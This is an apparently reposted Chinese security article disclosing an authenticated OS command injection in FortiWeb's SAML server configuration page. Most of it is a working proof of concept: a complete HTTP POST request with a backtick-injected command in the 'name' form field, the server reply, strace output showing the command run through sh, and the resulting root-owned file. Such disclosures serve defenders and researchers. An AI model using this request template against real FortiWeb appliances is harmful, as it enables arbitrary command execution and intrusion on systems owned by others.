文章来源:Khan安全攻防实验室
FortiWeb 管理界面(版本 6.3.11 及更早版本)中的操作系统命令注入漏洞可允许远程、经过身份验证的攻击者通过 SAML 服务器配置页面在系统上执行任意命令。
POC:
POST /api/v2.0/user/remoteserver.saml HTTP/1.1Host: [redacted]Cookie: [redacted]User-Agent: [redacted]Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://[redacted]/root/user/remote-user/saml-user/X-Csrftoken: 814940160Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412Content-Length: 3068Origin: https://[redacted]Dnt: 1Te: trailersConnection: close-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="q_type"1-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="name"`touch /tmp/vulnerable`-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="entityID"test-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="service-path"/saml.sso-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="session-lifetime"8-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="session-timeout"30-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="sso-bind"post-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="sso-bind_val"1-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="sso-path"/SAML2/POST-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="slo-bind"post-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="slo-bind_val"1-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="slo-path"/SLO/POST-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="flag"0-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="enforce-signing"disable-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="enforce-signing_val"0-----------------------------94351131111899571381631694412Content-Disposition: form-data; name="metafile"; filename="test.xml"Content-Type: text/xml<?xml version="1.0"?><md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test"><md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"><md:KeyDescriptor use="signing"><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>test</ds:X509Certificate></ds:X509Data></ds:KeyInfo></md:KeyDescriptor><md:KeyDescriptor use="encryption"><ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:X509Data><ds:X509Certificate>test</ds:X509Certificate></ds:X509Data></ds:KeyInfo></md:KeyDescriptor><md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat><md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/></md:IDPSSODescriptor></md:EntityDescriptor>-----------------------------94351131111899571381631694412--HTTP/1.1 500 Internal Server ErrorDate: Thu, 10 Jun 2021 11:59:45 GMTCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheSet-Cookie: [redacted]X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffContent-Length: 20Strict-Transport-Security: max-age=63072000Connection: closeContent-Type: application/json{"errcode": "-651"}
“touch”命令连接在 mkdir shell 命令中:
[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0
在 FortiWeb 设备的本地命令行上看到“touch”命令的结果:
/# ls -l /tmp/vulnerable-rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable/#
侵权请私聊公众号删文
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650520820&idx=2&sn=c13ee4de2f24c8c3ee4bc8d7a2aa461c&chksm=83bad910b4cd50067b5419666bfef0316ec999ab91d21df48a9ff4e7d30ba3405c89980d8b51#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh